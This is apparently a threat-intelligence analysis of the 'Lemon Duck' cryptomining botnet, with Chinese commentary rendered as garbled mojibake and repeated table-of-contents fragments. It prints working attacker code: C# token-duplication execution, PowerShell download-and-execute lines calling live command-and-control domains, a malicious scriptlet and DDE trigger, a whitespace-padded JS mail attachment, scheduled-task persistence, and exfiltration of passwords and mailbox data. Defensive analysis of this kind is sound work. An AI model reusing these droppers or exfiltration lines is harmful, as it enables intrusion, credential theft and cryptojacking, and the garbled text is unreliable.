        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern bool CloseHandle(IntPtr hSnapshot);
        [DllImport("Wtsapi32.dll", SetLastError=true)]
        private static extern bool WTSQueryUserToken(uint SessionId, ref IntPtr phToken);
        [DllImport("wtsapi32.dll", SetLastError = true)]
        private static extern int WTSEnumerateSessions(
            IntPtr hServer,
            int Reserved,
            int Version,
            ref IntPtr ppSessionInfo,
            ref int pCount);
        [StructLayout(LayoutKind.Sequential)]
        private struct PROCESS_INFORMATION
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public uint dwProcessId;
            public uint dwThreadId;
        }
        [StructLayout(LayoutKind.Sequential)]
        private struct STARTUPINFO
        {
            public int cb;
            public String lpReserved;
            public String lpDesktop;
            public String lpTitle;
            public uint dwX;
            public uint dwY;
            public uint dwXSize;
            public uint dwYSize;
            public uint dwXCountChars;
            public uint dwYCountChars;
            public uint dwFillAttribute;
            public uint dwFlags;
            public short wShowWindow;
            public short cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }
        private enum WTS_CONNECTSTATE_CLASS
        {
            WTSActive,
            WTSConnected,
            WTSConnectQuery,
            WTSShadow,
            WTSDisconnected,
            WTSIdle,
            WTSListen,
            WTSReset,
            WTSDown,
            WTSInit
        }
        [StructLayout(LayoutKind.Sequential)]
        private struct WTS_SESSION_INFO
        {
            public readonly UInt32 SessionID;
            [MarshalAs(UnmanagedType.LPStr)]
            public readonly String pWinStationName;
            public readonly WTS_CONNECTSTATE_CLASS State;
        }
        private static void StartProcessWithToken(ref IntPtr hUserToken,string cmd)
        {
            STARTUPINFO startInfo = new STARTUPINFO();
            PROCESS_INFORMATION procInfo = new PROCESS_INFORMATION();
            IntPtr pEnv = IntPtr.Zero;
			if(CreateEnvironmentBlock(ref pEnv,hUserToken,false))
			{
				Console.WriteLine("Create Environment Block Success");
			}
			
            startInfo.cb = Marshal.SizeOf(typeof(STARTUPINFO));
            uint dwCreationFlags = 0x00000400 | 0x08000000;
			//uint dwCreationFlags = 0x00000400 | 0x00000010;
            startInfo.wShowWindow = 0;
            startInfo.dwFlags = 1;
            startInfo.lpDesktop = "winsta0\\default";
            if (CreateProcessAsUser(hUserToken,
                "c:\\windows\\system32\\cmd.exe",
                "/c "+cmd,
                IntPtr.Zero,
                IntPtr.Zero,
                false,
                dwCreationFlags,
                pEnv,
                null,
                ref startInfo,
                out procInfo))
            {
            	Console.WriteLine("Start Process Success");
            } else 
			{
				Console.WriteLine(Marshal.GetLastWin32Error());
			}
            CloseHandle(hUserToken);
            CloseHandle(procInfo.hThread);
            CloseHandle(procInfo.hProcess);
        }
        public static void EnumSessionsAndExecCmd(string cmd)
        {
            IntPtr hImpersonationToken = IntPtr.Zero;
            IntPtr pSessionInfo = IntPtr.Zero;
            int sessionCount = 0;
            int arrayElementSize = Marshal.SizeOf(typeof(WTS_SESSION_INFO));
            IntPtr phUserToken = IntPtr.Zero;
            if (WTSEnumerateSessions(IntPtr.Zero, 0, 1, ref pSessionInfo, ref sessionCount) != 0)
            {
                Int64 current = pSessionInfo.ToInt64();
                for (int i = 0; i < sessionCount; i++)
                {
                    WTS_SESSION_INFO si = (WTS_SESSION_INFO)Marshal.PtrToStructure((IntPtr)(current), typeof(WTS_SESSION_INFO));
                    current += arrayElementSize;
                    Console.WriteLine("Get Session ID:"+si.SessionID);
                    if (WTSQueryUserToken(si.SessionID, ref hImpersonationToken))
                    {
                    	Console.WriteLine("Get Session Token Success");
                    	if (DuplicateTokenEx(hImpersonationToken, 0, IntPtr.Zero, 2, 1, ref phUserToken))
                    	{
                    		Console.WriteLine("Duplicate Token Success");
                    		StartProcessWithToken(ref phUserToken,cmd);
                    	}
                    }
                }
            }
        }
    }
}

# åéè·åçé®ç®±ç¸å³ä¿¡æ¯ é¾æ¥è¿å404 
(New-object net.webclient).downloadstring("http://d.ackng.com/report.json?type=mail&u=$muser&c1="+$contacts.count+"&c2="+$sent_tos.count+"&c3="+$recv_froms.count)

çæåå«æ¶æèæ¬çJSæä»¶ (readme.js)

function Add-Zip
{
    param([string]$zipfilename)
    if(-not (test-path($zipfilename)))
    {
        set-content $zipfilename ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
        (dir $zipfilename).IsReadOnly = $false  
    }
	
    $shellApplication = new-object -com shell.application
    $zipPackage = $shellApplication.NameSpace($zipfilename)
    
	foreach($file in $input) 
    { 
            $zipPackage.CopyHere($file.FullName)
            Start-sleep -milliseconds 500
    }
}


$att_js=$env:tmp+"\readme.js"
$js_code='var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''THEURL/7p.php?VER*mail_js*%username%*%computername%*''+[Environment]::OSVersion.version.Major);bpu (''THEURL/mail.jsp?js_VER'')";cmd.run(cmdstr,0,1);'.replace("THEURL",$base_url).replace("VER",$version)


# JSæä»¶é¿åº¦æ··æ·
($js_text+"`r`n"*(2000+(get-random)%1000)+" "*(102+(get-random)%100)+$js_code.trim())|out-file $att_js
$att_zip_name="readme.zip"
$att_zip=$env:tmp+"\$att_zip_name"
dir $att_js|Add-Zip $att_zip

çæåå«éå¯¹CVE-2017-8570æ¼æ´ä¸å¾®è½¯OfficeDDEï¼å¨ææ°æ®äº¤æ¢ï¼æ»å»çæ¶æUTFææ¡£ï¼ä¹åå«ä½urgent.doc ç°å¨å« readme.docï¼

ææ¡£æå¼åçæªå¾ï¼

æ¯ä¸æ¬¡é®ä»¶åéé½ä¼å¨æçæéæº15ä½éæºåç¬¦å½åçsctæä»¶

$filename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count 15)+".sct"

.sctæä»¶åå®¹ï¼

<?XML version="1.0"?>
<scriptlet>

<registration
    description="fjzmpcjvqp"
    progid="fjzmpcjvqp"
    version="1.00"
    classid="{204774CF-D251-4F02-855B-2BE70585184B}"
    remotable="true"
    >
</registration>

<script language="JScript">
<![CDATA[
        new ActiveXObject("WScript.Shell").Run('cmd /c powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(\'http://t.t\'+\'r2q.com/7p.php?0.7*mail_doc*%username%*%computername%*\'+[Environment]::OSVersion.version.Major);bpu (\'http://t.t\'+\'r2q.com/mail.jsp?doc_0.7\')&del %tmp%\\GUOtwYxlpzKPBSh.sct',0,1);window.close();
]]>
</script>

</scriptlet>

å¶æ§è¡ä»£ç ï¼ç¾ååçæ¾ç¤ºï¼

IEx(New-Object Net.WebClient).DownLoadString('http://t.tr2q.com/7p.php?0.7*mail_doc*%username%*%computername%*'+[Environment]::OSVersion.version.Major);
bpu ('http://t.tr2q.com/mail.jsp?doc_0.7');
del %tmp%/RANDOM.sct

ä½¿ç¨OfficeDDEåè½è¿è¡äºæ¬¡è§¦åï¼

$dde_cmd="powershell [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:%tmp%\$filename').Exec(0)&"

æåçæflagæä»¶ï¼è¡¨ç¤ºå·²åéè¿é®ä»¶

$env:tmp/godmali3.txt

report.jsp ï¼åå¥å®æ¶ä»»å¡blackballï¼

æºå¸¦ä¿¡æ¯:

è®¡ç®æºåï¼GUIDï¼MACå°åï¼ç³»ç»ï¼ç³»ç»ä½æ°ï¼ç¨æ·ï¼åï¼ç£çï¼æ¾å¡ï¼ååï¼ç®¡çåæéï¼æ¬å°è è«æ»å»Payloadï¼æ¬å°xmrigPayloadï¼xmrigçæ¬ï¼ç¿æ± å°åï¼ç®åï¼å¼æºæ¶é´ï¼ä¸ä¼ æ¶é´

http://t.awcna.com/report.jsp?EMOSMAC2077&05DCA6CB-2A44-C943-9E0D-9ABF4B11DCA8&00:1C:42:6E:F5:42&7 æè°ç _6.1.7601&1&EMo&WORKGROUP&&Parallels Display Adapter (WDDM)&2.25&1&&5B2849&&&&227546.396&&0.1
MD5 (report.jsp) = 6038cd68f69ac785118bb5b0d058b667

å»é¤å¤å±æ··æ·åçæºä»£ç ï¼

# è¥ä¸åå¨ä¼ ææ¹å¼åé$våä¸º?mig_20200427
if(!$v){
	$v='?mig_'+(Get-Date -Format 'yyyyMMdd')
}
# $v='mail'
$tmps='function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String(''2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10='');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url=''http://''+''U1''+''U2'';a($url+''/a.jsp'+$v+'?''+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join''*''))'

$sa=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
function getRan(){return -join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6))}
$us=@('t.awcna.com','t.tr2q.com','t.amynx.com')

$stsrv = New-Object -ComObject Schedule.Service
$stsrv.Connect()

# æ¥çæ¯å¦å·²ç»åå¨åä¸ºblackballçå®æ¶ä»»å¡
try{
	$doit=$stsrv.GetFolder("\").GetTask("blackball")
}catch{}
# è¥ä¸åå¨è¿è¡
if(-not $doit){
	if($sa){
		# æ¯120åéæ§è¡blackball 
		schtasks /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
	} else {
		schtasks /create /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
	}
	foreach($u in $us){
		$i = [array]::IndexOf($us,$u)
		# åå¥è®¡åä»»å¡çä½ç½®
		if($i%3 -eq 0){$tnf=''}
		if($i%3 -eq 1){$tnf=getRan}
		if($i%3 -eq 2){if($sa){$tnf='MicroSoft\Windows\'+(getRan)}else{$tnf=getRan}}
		$tn = getRan
		if($sa){
			schtasks /create /ru system /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -c PS_CMD"
		} else {
			schtasks /create /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD"
		}
		start-sleep 1
		$folder=$stsrv.GetFolder("\$tnf")
		$taskitem=$folder.GetTasks(1)
		foreach($task in $taskitem){
			foreach ($action in $task.Definition.Actions) {
				try{
					if($action.Arguments.Contains("PS_CMD")){	
						$folder.RegisterTask($task.Name, $task.Xml.replace("PS_CMD",$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5))), 4, $null, $null, 0, $null)|out-null
					}
				}catch{}
			}
		}
		schtasks /run /tn "$tnf\$tn"
		start-sleep 5
	}
}

æ¥çæ¯å¦å·²ç»åå¨åä¸ºblackballçå®æ¶ä»»å¡,

ä¸åå¨ååå»ºå®æ¶ä»»å¡æ§è¡ä»¥è·åè¿ç¨æä»¶a.jsp

http://d.ackng.com/report.json
http://d.ackng.com/log.json

# if.bin
(New-Object Net.WebClient).DownloadString('http://d.ackng.com/report.json?v='+$VVERSION+'&type=smbhost&ip='+$currip+'&t='+$t)

(New-Object Net.WebClient).DownloadString('http://d.ackng.com/report.json?v='+$VVERSION+'&type=ms&ip='+$currip+'&pass='+$allpass[$n]+'&t='+$t)

## é¤åºç¡ç¯å¢ä¿¡æ¯å¤è¿åå«æ¯ä¸ªå·²æ§è¡æ¨¡åçç¶æä¿¡æ¯
(New-Object Net.WebClient).DownloadString($down_url+'/log.json?V='+$VVERSION+'&'+$comp_name+'&'+$guid+'&'+$mac+'&r='+$retry+'&pc1='+$smb_portopen[1].count+'&pc2='+$ms_portopen[1].count+'&pc3='+$old_portopen[1].count+'&pc4='+$rdp_portopen[1].count+'&pci='+$ipaddrs_i.count+'&pco='+$ipaddrs_o.count+'&pcb='+$global:ipaddrs_b+'&pcs='+$pcs+'&mi='+($getpasswd -join "^^")+'&wf='+[Int]$wf+'&mf='+[Int]$mf)

# ifmail.bin
## é®ä»¶åéåé®ç®±èç³»äººç¸å³ä¿¡æ¯
(New-object net.webclient).downloadstring("http://d.ackng.com/report.json?type=mail&u=$muser&c1="+$contacts.count+"&c2="+$sent_tos.count+"&c3="+$recv_froms.count)

å¼æºé¡¹ç®çå©ç¨

https://github.com/xmrig/xmrig-cuda/releases

xmrigæç¿ç¨åº

https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1

å°æç¿ç¨åºxmrigï¼åå°å¼æ³¨å¥powershell.exeä¸

https://github.com/rxwx/CVE-2017-8570

OLEæ»å»ææ¡£ä»£ç çæçæ¥æº

æ³¨æï¼scriptletä»£ç ä¸ååå¼ç¨çCVE-2017-8570çGithubé¡µé¢ä¸æ¾ç¤ºçä»£ç å®å¨å¹éã

åç¬¦ä¸²â fjzmpcjvqpâæ¯å¯ä¸çï¼å¦æè¯¥ä»£ç ä¸æ¯ä½¿ç¨ç¸åçå¬å±POCæ¼æ´å©ç¨ä»£ç çæçï¼åä¸åºè¯¥å¦æ¤å·§åã

https://github.com/mardahl/MyScripts-iphase.dk/blob/master/function_executeAsLoggedOnUser.ps1

ç¨äºif_mail.jspä¸å¨æç»å½ç¨æ·ä¸æ§è¡

https://github.com/FreeRDP/FreeRDP

wfree.exe çæ¥æº

https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1

åå¸ä¼ éæ»å»æ¨¡åæ¥æº

https://github.com/ollypwn/SMBGhost

CVE-2020-0796 SMBGhost POC åç§è¯¥Pythoné¡¹ç®ä¿®æ¹ä¸ºPowershellçæ¬

åèé¾æ¥

ç¸å³æ»å»äºä»¶

2018-12-15

å©ç¨âé©±å¨äººçâåçº§ç¨åºçæ¶æç¨åºé¢è¦ 360

ackng.com dl.haqo.net p.abbny.com

https://cert.360.cn/warning/detail?id=57cc079bc4686dd09981bf034130f1c9

https://mp.weixin.qq.com/s?biz=MzI3NjYzMDM1Mg==&mid=2247485801&idx=1&sn=233c83c3dec9376b3d04d7ddd40903e6&scene=21#wechat_redirect

2018-12-17

pull.update.ackng.com

https://mp.weixin.qq.com/s/ctBgivcvH216dwq00WRmOA

https://ti.qianxin.com/blog/articles/an-attack-of-supply-chain-by-qudongrensheng/

é©±å¨äººçå¬å¸å¢éå¨åç»åå¸çå³äºæ»å»æ´»å¨çå£°æä¸è¯´ä»ä»¬å½æ¶æ£å¨å¢å»ºæ´»å¨ä¸ï¼å¦æç¡®å®ä¸ºå¤é¨çæ»å»ï¼é£ææ¾æ¯ä¸ä¸ªå¯¹å¬å¸çè¿ä½éå¸¸çæçäººåæ§è¡çä¸åºæé¢è°ççªè¢ãï¼è¿ç¹ä¼°è®¡åªæ¯ä¸ºç©éæè¯´çâ¦â¦ï¼

2018-12-19

r.minicen.ga

http://www.360.cn/n/10528.html

2019-01-24

https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247486576&idx=1&sn=dc5ff6a05fac06608365823173d17dae

2019-01-28

https://guanjia.qq.com/news/n3/2475.html

2019-01-30

https://payloads.online/archivers/2019-02-23/1

2019-02-14

åç°ä¸äºæ¶åMykingså®¶ææ´»å¨çç°è±¡ï¼ä½æªè½å¾åºç¡®å®æ§çç»è®º (å ä¸º81.177.135.35)

https://www.freebuf.com/articles/system/195337.html

2019-02-20

Monero Miner-Malware Uses RADMIN, MIMIKATZ to Infect, Propagate via Vulnerability

haqo.net abbny.com æ°åºç° beahh.com ï¼ä¸r.minicen.gaç¸åè§£æ27.102.107.137ï¼

https://blog.trendmicro.com/trendlabs-security-intelligence/monero-miner-malware-uses-radmin-mimikatz-to-infect-propagate-via-vulnerability/

2019-02-22

https://s.tencent.com/research/report/657.html

2019-03-01

è¿æ¥ï¼çæå®å¨ç ç©¶é¢çæµå°å©ç¨âé©±å¨äººçâä¼ æçæç¿æ¨é©¬çæ¯åæ¬¡æ´

http://it.rising.com.cn/dongtai/19521.html

2019-03-11

éè¿å¯¹æ¯åæè¿åç°âæ°¸æä¹èâæ¨é©¬ä¸è½½å¨é»äº§å¢ä¼ä½¿ç¨çPowershellæ»å»ä»£ç ä¸è¾è®¯å¾¡è§å¨èææ¥ä¸å¿2018å¹´9æåç°çMykingsåµå°¸ç½ç»åç§æ»å»ä»£ç æè¯¸å¤ç¸ä¼¼ä¹å¤ï¼å æ¤æ¨æµä¸¤èå·ææç§èç³»ã

https://s.tencent.com/research/report/674.html

2019-04-24

Beapy: Cryptojacking Worm Hits Enterprises in China

More than 80 percent of its victims located in China, with other victims in South Korea, Japan, and Vietnam.

èµé¨éåå½åå¶ä¸ºBeapy

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china

2019-06-05

Monero-Mining Malware PCASTLE Zeroes Back In on China, Now Uses Multilayered Fileless Arrival Techniques

powershell ç»æ ä¸sophosçæ¥åå³è

Lemon-Duck ææ©å¨æ¥åä¸åºç°

https://blog.trendmicro.com/trendlabs-security-intelligence/monero-mining-malware-pcastle-zeroes-back-in-on-china-now-uses-multilayered-fileless-arrival-techniques/

2019-07-30

https://s.tencent.com/research/report/768.html

2019-08-02

çæï¼ä¸æè¡¥ä¸çè¯·è¦æDTLææ°åç§

http://it.rising.com.cn/dongtai/19620.html

2019-08-16

çæï¼ä¸æäºæ´ âDTLMinerâçæ¯æç¹ç

https://it.rising.com.cn/dongtai/19629.html

2019-09-03

çä¼¼æç¿æ¨é©¬çæ¯"DTLMiner"çæ°åç§ ï¼"43669/1/summary"ï¼

http://it.rising.com.cn/dongtai/19635.html

2019-10-14

http://it.rising.com.cn/dongtai/19652.html

2019-10-31

DTLMineråæ´æ° æé¤å¼å·±å¹¶æåæ»å»æåç

http://it.rising.com.cn/dongtai/19659.html

2019-10-01

Lemon_Duck PowerShell malware cryptojacks enterprise networks sophos

Based on the compromised machine count in the telemetry, we suspect that the attacks may have originated in Asia, but have spread to every continent.

æ»å»èå»¶å°å¨ç

$Lemon_Duck

https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/

2020-02-05

New Lemon Duck Malware Campaign Targets IoT, Large Manufacturers

Lemon_Duck PowerShell

æ³¢åIoTè®¾å¤ç¶åµ

https://vulners.com/threatpost/THREATPOST:FC124FCB1BDB55D5A63163F8F4720021

TrapX Security Identifies New Malware Campaign Targeting IoT Devices Embedded With Windows 7 at Manufacturing Sites

https://www.prnewswire.com/news-releases/trapx-security-identifies-new-malware-campaign-targeting-iot-devices-embedded-with-windows-7-at-manufacturing-sites-300999051.html

https://trapx.com/landing/iot-manufacturing-report/

2020-02-06

Lemon Duck Malware : Infecting outdated Windows systems using EternalBlue

https://www.secpod.com/blog/lemon-duck-malware/

2020-02-29

å¨éç¤¾åºåç°åå¨IPCæ»å»

https://www.v2ex.com/t/648332

2020-3-24

å¨ç¤¾åºåç°åå¨ä¹åçæ¬æ¶æä»£ç

win10çpowershellæ¯æ¬æ¥å°±å¡é¡¿è¿æ¯å ä¸ºæçæ¯

https://www.hostloc.com/thread-663326-1-1.html

2020-03-06

https://www.freebuf.com/articles/terminal/228521.html

2020-04-03 (åæ ·æ¬)

https://s.tencent.com/research/report/950.html

2020-04-10 (åæ ·æ¬)

https://s.tencent.com/research/report/957.html

2020-04-15

https://mp.weixin.qq.com/s/HWdvSzN8Sl4ol0nnWs8m2w

2020-04-17

Weaponized RTF Document Generator & Mailer in PowerShell

https://isc.sans.edu/diary/Weaponized+RTF+Document+Generator+%26+Mailer+in+PowerShell/26030

2020-04-21

æ¥èªâèè¶âçé®åï¼âä½ æ¯ä¸æ¯ç¯âï¼æèæ°æ»å»ææ³ è¾è®¯

https://s.tencent.com/research/report/967.html

2020-06-03

https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ

2020-10-13

æ æª¬é¸ä½¿å å¯è´§å¸ç¿å·¥éæ°æä¸ºå³æ³¨ç¦ç¹ talos

https://blog.talosintelligence.com/2020/10/lemon-duck-brings-cryptocurrency-miners.html

å³èåèä¿¡æ¯

2017-07-15

ftp://81.177.135.35/./a.exe

https://packettotal.com/app/analysis?id=cd988ed555a1b8857f6b1587971769f5&name=ftp

2018-01-24

MyKings: ä¸ä¸ªå¤§è§æ¨¡å¤éåµå°¸ç½ç»

https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/

2018-02-02

81.177.135.35 -> mys2016.info

Smominru Monero mining botnet making millions for operators

https://otx.alienvault.com/pulse/5a744ab2542d5e34b443da23/

2018-09-10

Mykingsåµå°¸ç½ç»åç§æ»å» è¾è®¯

https://www.freebuf.com/column/183705.html

2019-02-10

æäºIII v3.0 ãMykingsãMiraiå¤ä¸ªçæ¯å®¶æç»ä¼´æ¥è¢çå®æåæ

81.177.135.35

https://www.freebuf.com/vuls/194515.html

2019-02-14

èµï¼è¿ä¸ªæ¥åå¸®æä»¬åå°äºé¨åå³èåæçå·¥ä½

https://www.freebuf.com/articles/system/195337.html

æ°å¢Pythonæ»å»æ¨¡å:

Lemon-Duck
Lemon-Duck copied to clipboard

Metadata

èµ·åºâAPTâæç¿ç»ç»âââå°é»é¸âLemonDuck

æè¦

ç®è¦åæ

æ»å»èµ·æº

è¿æåå¨

æº¯æºåæ

å³äºå½åï¼ä¸ºå¥å«å°é»é¸ï¼

æ£æµæ¹æ¡

ä¿®å¤å»ºè®®

é²èå»ºè®®

IOCs

Domainï¼

IP:

MD5:

Ports:

File:

Yara:

PUBLIC KEYï¼

å¶ä½¿ç¨çIEX (invoke-expression) æ··æ·:

è¯¦ç»åæ

ä»æ¶å°é®ä»¶å¼å§

7p.php (BypassUAC)

mail.jsp (create schtasks)

a.jsp ï¼æç¿åä¼ æï¼

if.binï¼ä¸»è¦æ»å»æ¨¡åï¼

m6.bin (XMRig)

m6g.bin (XMRig opencl cuda)

if_mail.bin (ä½¿ç¨Outlookä¼ æçæçæ¶æææ¡£)

report.jsp ï¼åå¥å®æ¶ä»»å¡blackballï¼

å¼æºé¡¹ç®çå©ç¨

åèé¾æ¥

ç¸å³æ»å»äºä»¶

å³èåèä¿¡æ¯

← Metadata

Owner

Metadata

Lemon-Duck Lemon-Duck copied to clipboard

Metadata

èµ·åºâAPTâæç¿ç»ç»âââå°é»é¸­âLemonDuck

æè¦

ç®è¦åæ

æ»å»èµ·æº

è¿æåå¨

æº¯æºåæ

å ³äºå½åï¼ä¸ºå¥å«å°é»é¸­ï¼

æ£æµæ¹æ¡

ä¿®å¤å»ºè®®

é²èå»ºè®®

IOCs

Domainï¼

IP:

MD5:

Ports:

File:

Yara:

PUBLIC KEYï¼

å ¶ä½¿ç¨çIEX (invoke-expression) æ··æ·:

è¯¦ç»åæ

ä»æ¶å°é®ä»¶å¼å§

7p.php (BypassUAC)

mail.jsp (create schtasks)

a.jsp ï¼æç¿åä¼ æ­ï¼

if.binï¼ä¸»è¦æ»å»æ¨¡åï¼

m6.bin (XMRig)

m6g.bin (XMRig opencl cuda)

if_mail.bin (ä½¿ç¨Outlookä¼ æ­çæçæ¶æææ¡£)

report.jsp ï¼åå ¥å®æ¶ä»»å¡blackballï¼

å¼æºé¡¹ç®çå©ç¨

åèé¾æ¥

ç¸å ³æ»å»äºä»¶

å ³èåèä¿¡æ¯

← Metadata

Owner

Metadata

Lemon-Duck
Lemon-Duck copied to clipboard

èµ·åºâAPTâæç¿ç»ç»âââå°é»é¸âLemonDuck

æè¦

ç®è¦åæ

æ»å»èµ·æº

è¿æåå¨

æº¯æºåæ

å³äºå½åï¼ä¸ºå¥å«å°é»é¸ï¼

æ£æµæ¹æ¡

ä¿®å¤å»ºè®®

é²èå»ºè®®

Domainï¼

PUBLIC KEYï¼

å¶ä½¿ç¨çIEX (invoke-expression) æ··æ·:

è¯¦ç»åæ

ä»æ¶å°é®ä»¶å¼å§

a.jsp ï¼æç¿åä¼ æï¼

if.binï¼ä¸»è¦æ»å»æ¨¡åï¼

if_mail.bin (ä½¿ç¨Outlookä¼ æçæçæ¶æææ¡£)

report.jsp ï¼åå¥å®æ¶ä»»å¡blackballï¼

å¼æºé¡¹ç®çå©ç¨

åèé¾æ¥

ç¸å³æ»å»äºä»¶

å³èåèä¿¡æ¯